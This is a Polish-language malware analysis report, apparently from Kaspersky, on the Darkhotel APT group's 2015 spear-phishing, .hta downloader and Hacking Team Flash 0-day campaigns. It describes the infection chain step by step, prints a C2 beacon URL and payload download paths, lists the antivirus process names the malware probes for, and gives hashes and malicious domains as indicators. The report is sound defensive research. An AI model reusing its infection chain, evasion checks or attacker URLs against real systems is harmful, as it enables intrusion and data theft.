Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Ataki grupy Darkhotel w 2015 r.

Tagi:

Ataki APT przeprowadzane przez ugrupowanie Darkhotel w 2014 roku i wcześniej charakteryzują się wykorzystaniem skradzionych certyfikatów, umieszczaniem plików .hta przy użyciu różnych technik oraz stosowaniem nietypowym metod, takich jak infiltracja hotelowej sieci Wi-Fi w celu umieszczenia backdoorów w atakowanym systemach. Wiele z tych technik i działań było nadal wykorzystywanych w 2015 r. Jednocześnie, oprócz nowych wariantów szkodliwych plików .hta, doszły nowe ofiary, załączniki .rar ze spear phishingiem RTLO oraz lokowanie exploitów 0-day grupy Hacking Team.      

Grupa Darkhotel nadal atakuje cele na całym świecie przy użyciu spear phishingu, jednak zwiększyła swój zasięg geograficzny w stosunku do wcześniejszych ataków na hotelowe sieci Wi-Fi oraz ataków mających na celu rozbudowę botnetu. Niektóre z jej celów dotyczą kręgów dyplomatycznych lub strategicznych interesów handlowych. 

Lokalizacja celów i ofiar grupy Darkhotel w 2015 r.:

  • Korea Północna
  • Rosja
  • Korea Południowa
  • Japonia
  • Bangladesz
  • Tajlandia
  • Indie
  • Mozambik
  • Niemcy

Strony związane z plikami .hta, backdoorami, exploitami i C2 wykorzystywane przez Darkhotel w 2015 r.:

  • storyonboard[.]net
  • tisone360[.]org
  • openofficev[.]info
  • saytargetworld[.]net
  • error-page[.]net
  • eonlineworld[.]net
  • enewsbank[.]net
  • thewordusrapid[.]com

Podzbiór nazw załączników w incydentach spear phishingu w 2015 r.:

  • schedule(6.1~6).rar -> schedule(6.1~6)_?gpj.scr
  • schedule(2.11~16).rar -> schedule(2.11~16)_?gpj.scr
  • congratulation.rar -> congratulation_?gpj.scr
  • letter.rar -> letter_?gpj.scr

Konsekwentne wykorzystywanie zaciemnionych downloaderów .hta

Niezależnie od tego, czy do infekcji dochodzi przy użyciu ataków typu spear phishing, uzyskania fizycznego dostępu do systemu czy exploita zero-day grupy Hacking Team dla Flasha, często można wyróżnić tę samą metodę komunikacji nowo zainfekowanego systemu z centrum kontroli Darkhotel: 

Lekko zaciemniony skrypt znajdujący się w pliku .hta zapisuje plik wykonywalny na dysku i wykonuje go.

Ciekawe jest to, że grupa ta od wielu lat umieszcza kod backdoorów i downloaderów w postaci plików .hta. W 2010 r. wykorzystała artykuły dotyczące Korei Północnej stworzone przez amerykański Brookings Institute, aby zaatakować cele związane z Koreą Północną przy pomocy szkodliwego kodu ukrytego w plikach .hta. Ponadto, odsyłacze prowadzące do szkodliwych plików .hta wysyłała za pośrednictwem poczty e-mail grupom turystycznym z Korei Północnej, ekonomistom zainteresowanym Koreą Północną i innym. Wykorzystywanie w tak dużym stopniu starszej technologii specyficznej dla Windowsa, takiej jak aplikacje HTML wprowadzone przez Microsoft w 1999 r., wydaje się nieco dziwne.

Z sendspace.servermsys.com/downloader.hta:

Darkhotel_1_auto.jpg

Po wykonaniu i modyfikacji kilku zmiennych .hta wykorzystuje stare komponenty Adodb.stream, aby zapisać ciąg przepuszczony przez funkcję XOR 0x3d jako plik wykonywalny, i uruchamia go.  

Darkhotel_2.jpg

Kod ten powoduje wykonanie “internet_explorer_Smart_recovery.exe” 054471f7e168e016c565412227acfe7f, następnie ukryte okno przeglądarki kontaktuje się ze swoim centrum kontroli (C2). W tym przypadku, wygląda na to, że operatorzy Darkhotel sprawdzają, czy Internet Explorer jest domyślną przeglądarką ofiary, ponieważ wszystkie wersje IE zwracają wartość “0”, a dla pozostałych przeglądarek “appMinorVersion” pozostaje niezdefiniowany. Ten zbiór danych wydaje się nieco dziwny, ponieważ pliki .hta są obsługiwane i uruchamiane przez mshta.exe tylko w systemach Windows. Być może jest to artefakt z wcześniejszych etapów rozwoju kodu. Ostatnia wersja to:    
“hxxp://sendspace.servermsys.com/readme.php?type=execution&result=created_and_executed&info=" + navigator.appMinorVersion + ”

Darkhotel_3_auto.jpg

Plik “internet_explorer_Smart_recovery.exe” jest prostym zaciemnionym downloaderem. Seria pętli XOR 0x28 deszyfruje zawartość samo kasującego się pliku wsadowego, który jest następnie zapisywany na dysku i wykonywany. Później bardziej złożona pętla RC4 deszyfruje URL downloadera oraz inne ciągi. 

Darkhotel_4.jpg 

Kiedy proces ten zostanie zakończony, ciąg URL ma postać http://sendspace.servermsys.com/wnctprx. Pik jest pobierany (b1f56a54309147b07dda54623fecbb89) do pliku .tmp w folderze %temp%, wykonywany, a następnie downloader kończy działanie. Ten większy plik to backdoor/downloader, który zawiera funkcjonalność SSH i wrzuca swoje klucze na dysk w celu umożliwienia komunikacji SSH. Znaleźliśmy starsze programy Darkhotel służące do kradzieży informacji, które zostały wrzucone i uruchomione w systemie przez te downloadery.      

Spearphishing oraz załączniki .rar z RTLO

Ugrupowanie APT o nazwie Darkhotel przeprowadza nieustające ataki typu spear phishing na swoje cele w celu włamania się do systemów. Niektóre cele są atakowane wielokrotnie przy użyciu niemalże tej samej metody socjotechniki. Na przykład, załącznik “schedule(2.11~16).rar” mógł zostać wysłany 10 lutego, a następnie Darkhotel zaatakował te same cele w drugim podejściu pod koniec maja, stosując załącznik “schedule(6.1~6).rar”.   

 Darkhotel_5.jpg

Konsekwentnie archiwizuje pliki wykonywalne RTLO .scr przy pomocy archiwów .rar, tak aby cel ataków myślał, że ma do czynienia z nieszkodliwymi plikami .jpg. Te pliki wykonywalne to lekkie droppery, zawierające służące za przynętę pliki jpeg oraz kod w celu stworzenia downloadera Ink. 

Darkhotel_6.jpg

Gdy cel ataku próbuje otworzyć rzekomy plik jpg, zostaje uruchomiony kod wykonywalny i wrzuca obraz jpg na dysk, następnie otwiera go przy użyciu mspaint.exe w tle. Ten dokument “z gratulacjami” jest w języku koreańskim, co ujawnia prawdopodobną cechę profilu ofiary. 

 Darkhotel_7.jpg

W czasie, gdy wyświetlany jest obraz, kod zrzuca na dysk i uruchamia nietypowy skrót mspaint.lnk. Skrót ten zawiera wielowierszowy skrypt powłoki. Technika ta jest również wykorzystywana przez inne grupy APT jako mechanizm przetrwania. Plik Ink o rozmiarze 64kb jest kodem downloadera:      

 Darkhotel_8_auto.jpg

Gdy plik Ink zostanie wykonywany, zaczyna oparty na technologii AJAX proces pobierania dla pliku “unzip.js” (a07124b65a76ee7d721d746fd8047066) na openofficev.info. Jest to kolejny plik wscript implementujący technologię AJAX w celu pobrania i wykonania stosunkowo dużego skompilowanego pliku wykonywalnego:  

Darkhotel_9.jpg

Ten kod wykonywalny jest zapisywany i wykonywany w %temp%\csrtsrm.exe. Jest to stosunkowo duży plik wykonywalny (~1.2 MB), który wstrzykuje szkodliwy kod i umieszcza zdalne wątki w legalnych procesach.   

Skradzione certyfikaty i unikanie wykrycia

Wygląda na to, że grupa gromadzi skradzione certyfikaty i rozmieszcza podpisane nimi downloadery i backdoory. Niektóre z odwołanych niedawno certyfikatów należą do Xuchang Hongguang Technology Co. Ltd.

Obecnie Darkhotel zwykle ukrywa swój kod pod warstwami szyfrowania. Możliwe, że powoli przystosował się do atakowania lepiej chronionych środowisk i woli nie palić tych skradzionych certyfikatów cyfrowych. We wcześniejszych atakach wykorzystałby po prostu długą listę słabo zaimplementowanych, złamanych certyfikatów. 

Nie tylko stosuje mocniejsze techniki zaciemniania, ale również rozszerza swoją listę stosowanych technologii ochrony przed wykryciem. Na przykład ten podpisany downloader (d896ebfc819741e0a97c651de1d15fec) odszyfrowuje zestaw ciągów antywirusowych etapami w celu zidentyfikowania technologii ochrony w nowo zainfekowanym systemie, a następnie otwiera każdy proces, szukając pasującej nazwy obrazu:  

c:\avast! sandbox\WINDOWS\system32\kernel32.dll - Avast!
avp.exe - Kaspersky Lab
mcagent.exe;mcuicnt.exe - Intel/Mcafee
bdagent.exe - BitDefender
ravmon.exe,ravmond.exe - Beijing Rising
360tray.exe,360sd.exe,360rp.exe,exeMgr.exe - Qihoo 360
ayagent.aye,avguard.;avgntsd.exe - Avira Antivirus
ccsvchst.exe,nis.exe - Symantec Norton
avgui.exe,avgidsagent.exe,avastui.exe,avastsvc.exe - Avast!
msseces.exe;msmpeng.exe - Microsoft Security Essentials and Microsoft Anti-Malware Service
AVK.exe;AVKTray.exe - G-Data
avas.exe - TrustPort AV
tptray.exe - Toshiba utility
fsma32.exe;fsorsp.exe - F-Secure
econser.exe;escanmon.exe - Microworld Technologies eScan
SrvLoad.exe;PSHost.exe - Panda Software
egui.exe;ekrn.exe - ESET Smart Security
pctsSvc.exe;pctsGui.exe - PC Tools Spyware Doctor
casc.exe;UmxEngine.exe - CA Security Center
cmdagent.exe;cfp.exe - Comodo
KVSrvXP.exe;KVMonXP.exe - Jiangmin Antivirus
nsesvc.exe;CClaw.exe - Norman
V3Svc.exe - Ahnlab
guardxup. - IKARUSF
ProtTray. - F-Prot
op_mon - Agnitum Outpost
vba332ldr.;dwengine. - DrWeb

Nawet informacje identyfikacyjne, których backdoor szuka w systemie, nie zostają odszyfrowane do czasu uruchomienia. Podobnie jak program kradnący informacje, o którym pisaliśmy w naszym poprzednim raporcie technicznym dotyczącym Darkhotel, komponent ten próbuje ukraść zestaw danych, za pomocą których można zidentyfikować zainfekowany system. Spora część informacji jest zbierana przy użyciu tego samego zestawu wywołań, tj. kernel32.GetDefaultSystemLangID, kernel32.GetVersion oraz kernel32.GetSystemInfo:    

  • Domyślna strona kodowa systemu
  • Informacje dotyczące karty sieciowej
  • Architektura procesora
  • Nazwa hosta i adres IP
  • Wersje systemu Windows i Service Pack

Zasadniczo, duża część kodu tego programu służącego do kradzieży informacji jest taka sama jak w przypadku wcześniejszych ataków.

Tisone360.com, odwiedziny i exploit 0-day Hacking Team

Szczególnie interesująca była dla nas strona tisone360.com. W kwietniu 2015 r. Darkhotel wysyłał wiadomości phishingowe zawierające odsyłacze do wcześniejszych exploitów dla Flasha, a następnie, na początku lipca, zaczął rozprzestrzeniać exploita 0-day, który wyciekł grupie Hacking Team.      

Wygląda na to, że grupa APT o nazwie Darkhotel mogła wykorzystywać tego exploita w celu atakowania określonych systemów. “tisone360.com” może pomóc zidentyfikować niektóre z jej działań. Strona ta działała jeszcze 22 lipca 2015 r. Wygląda jednak na to, że jest to niewielka część jej aktywności. Oprócz 0-day icon.swf HT (214709aa7c5e4e8b60759a175737bb2b) w kwietniu strona “tisone360.com” dostarczała prawdopodobnie również exploita CVE-2014-0497 dla Flasha. W styczniu 2014 r. poinformowaliśmy o luce związanej z tym exploitem firmę Adobe, gdy była wykorzystywana przez grupę APT o nazwie Darkhotel.

Niedawno grupa Darkhotel utrzymywała na tej stronie wiele działających katalogów.

 Darkhotel_10.png

Najaktywniejszy jest katalog ims2. Zawiera zestaw backdoorów oraz exploitów. Najciekawszym z nich jest exploit 0-day dla Flasha, który wyciekł grupie Hacking Team, icon.swf. Po tym, jak o serwerze tym poinformowano publicznie, grupa Darkhotel powoli uszczelniła otwarty dostęp do /ims2/. Mimo to jego zawartość nadal była aktywnie wykorzystywana.    

icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg
(42a837c4433ae6bd7490baec8aeb5091)
-> %temp%\RealTemp.exe (61cc019c3141281073181c4ef1f4e524)

Gdy icon.jpg zostanie pobrany przez exploita dla Flasha, zostaje odszyfrowany przy użyciu wielobajtowego klucza XOR 0xb369195a02. Następnie pobiera kolejne komponenty.   

Warto zauważyć, że grupa ta prawdopodobnie zmienia kompilację i znaczniki czasowe konsolidatora swojego kodu wykonywalnego na daty z 2013 r. Można zauważyć to w licznych próbkach, które zostały zaobserwowane po raz pierwszy w połowie 2015 r., łącznie z downloaderem icon.jpg. 

Darkhotel_11_auto.jpg

Z dziennika odwiedzin katalogu tej strony wynika, że katalog został stworzony 8 lipca. 8 i 9 lipca odnotowano kilka odwiedzin konkretnego adresu URL na serwerze z pięciu systemów zlokalizowanych w wyszczególnionych niżej miejscach. Kilka z nich stanowi prawdopodobnie cel Darkhotel:

  • Niemcy
  • Korea Południowa
  • Chiny
  • US
  • Japonia

Jednak jeden z tych systemów odwiedził tę stronę 9 lipca prawie 12 000 razy w ciągu 30 minut. Tak duży ruch stanowi prawdopodobnie próbę zbadania tego zasobu, nie zaś atak DoS:  

Darkhotel_12_auto.jpg

Zarejestrowane odwiedziny na stronie po 9 lipca nie są wiarygodne i mogą odpowiadać za nie kolejni badacze, którzy zainteresowali się tym zasobem po publikacji raportów 9 lipca. Wiele spośród tych około 50 odwiedzin pochodziło z podzbioru wskazanych wyżej systemów i zostało wielokrotnie powtórzonych. Odwiedziny dokonane z poniższych lokalizacji odnotowano 10 lub później:    

  • Niemcy (prawdopodobnie badanie)
  • Ukraina (prawdopodobnie badanie)
  • Amazon Web Services, wiele lokalizacji (prawdopodobnie badanie)
  • Googlebot, wiele lokalizacji
  • US
  • Irlandia (prawdopodobnie badanie)
  • Rosja
  • Brazylia
  • Chiny
  • Finlandia
  • Kanada
  • Tajwan
  • Francja (prawdopodobnie badanie)
  • Republika Czeska

Konsekwentny strumień ataków

Grupa Darhotel zwykle trzyma się tego, co działa. Na przykład przez lata wielokrotnie stosowała ataki typu spear phishing z wykorzystaniem plików .hta. W 2015 r. zaobserwowaliśmy wielokrotne wykorzystanie kreatywnego łańcucha dostarczania komponentów, jak miało to miejsce w przypadku strony tisone360.com.  

downloader -> zaewidencjonowanie hta -> program wykradający informacje -> więcej
skompilowanych komponentów.
dropper -> skrypt wsh -> skrypt wsh -> program wykradający informacje -> więcej
skompilowanych komponentów
spearphish -> dropper -> zaewidencjonowanie hta -> downloader -> program
wykradający informacje

O ile łańcuch dostarczania, który obejmuje zaciemnione skrypty wewnątrz plików .hta, zauważyliśmy już w 2011 r., nasilenie nastąpiło w 2014 r. i teraz w 2015 r.

openofficev[.]info (2015)
office-revision[.]com (2014)
online.newssupply[.]net (2011)

Włamania do infrastruktury na widoku

Omawiana grupa stała się czujniejsza jeśli chodzi o prowadzenie swoich stron, uszczelniając konfigurację i zawartość odpowiedzi. Obecnie jej centrum kontroli (C2) odpowiada przy użyciu obrazów “Drinky Crow” z kreskówki opartej na komiksie Maakies:  

Darkhotel_13_auto.png

Inne centra kontroli Darkhotel zwykle nie różnią się od losowych stron w Internecie w przypadku odwiedzenia niepoprawnych lub nieistniejących stron. Są to obrazy z serwisu FOTOLIA lub artykuły dotyczące twórców lodów:  
Darkhotel_14_auto.jpg

md5 HTA:

021685613fb739dec7303247212c3b09
1ee3dfce97ab318b416c1ba7463ee405
2899f4099c76232d6362fd62ab730741
2dee887b20a06b8e556e878c62e46e13
6b9e9b2dc97ff0b26a8a61ba95ca8ff6
852a9411a949add69386a72805c8cb05
be59994b5008a0be48934a9c5771dfa5
e29693ce15acd552f1a0435e2d31d6df
fa67142728e40a2a4e97ccc6db919f2b
fef8fda27deb3e950ba1a71968ec7466

 

md5 załączników spearphish:

5c74db6f755555ea99b51e1c68e796f9
c3ae70b3012cc9b5c9ceb060a251715a
560d68c31980c26d2adab7406b61c651
da0717899e3ccc1ba0e8d32774566219
d965a5b3548047da27b503029440e77f
dc0de14d9d36d13a6c8a34b2c583e70a
39562e410bc3fb5a30aca8162b20bdd0 (po raz pierwszy zauważony pod koniec 2014 r.,
wykorzystywany w 2015 r.)

e85e0365b6f77cc2e9862f987b152a89 (po raz pierwszy zauważony pod koniec 2014 r.,
wykorzystywany w 2015 r.)

 

md5 dużego downloadera 2015:

5e01b8bc78afc6ecb3376c06cbceb680
61cc019c3141281073181c4ef1f4e524
3d2e941ac48ae9d79380ca0f133f4a49
fc78b15507e920b3ee405f843f48a7b3
da360e94e60267dce08e6d47fc1fcecc
33e278c5ba6bf1a545d45e17f7582512
b1f56a54309147b07dda54623fecbb89
009d85773d519a9a97129102d8116305

 

Program wykradający informacje wrzucony w 2015 r.

61637a0637fb25c53f396c305efa5dc5
a7e78fd4bf305509c2fc1b3706567acd

 

Sub-hosty i adresy url:

tisone360.com/img_h/ims2/icon.swf
tisone360.com/img_h/ims2/1.php
tisone360.com/img_h/ims2/icon.jpg
tisone360.com/noname/img/movie.swf
tisone360.com/noname/minky/face.php
tisone360.com/htdoc/ImageView.hta
tisone360.com/htdoc/page1/page.html 
daily.enewsbank.net/wmpsrx64
daily.enewsbank.net/newsviewer.hta
saytargetworld.net/season/nextpage.php
sendspace.servermsys.com/wnctprx
error-page.net/update/load.php
photo.storyonboard.net/wmpsrx64
photo.storyonboard.net/photoviewer.hta
photo.storyonboard.net/readme.php
unionnewsreport.net/aeroflot_bonus/ticket.php
www.openofficev.info/xopen88/office2www.openofficev.info/dec98/unzip.js
www.openofficev.info/open99/office32
www.openofficev.info/decod9/unzip.js

 

Podobne i wcześniejsze badania

CVE-2014-0497 – A 0-day Vulnerability

https://securelist.com/blog/incidents/58244/cve-2014-0497-a-0-day-vulnerability/

 

Hacking Team Flash Zero-Day Tied To Attacks In Korea and Japan… on July 1

http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-tied-to-attacks-in-korea-and-japan-on-july-1/

The Darkhotel APT

https://securelist.com/blog/research/66779/the-darkhotel-apt/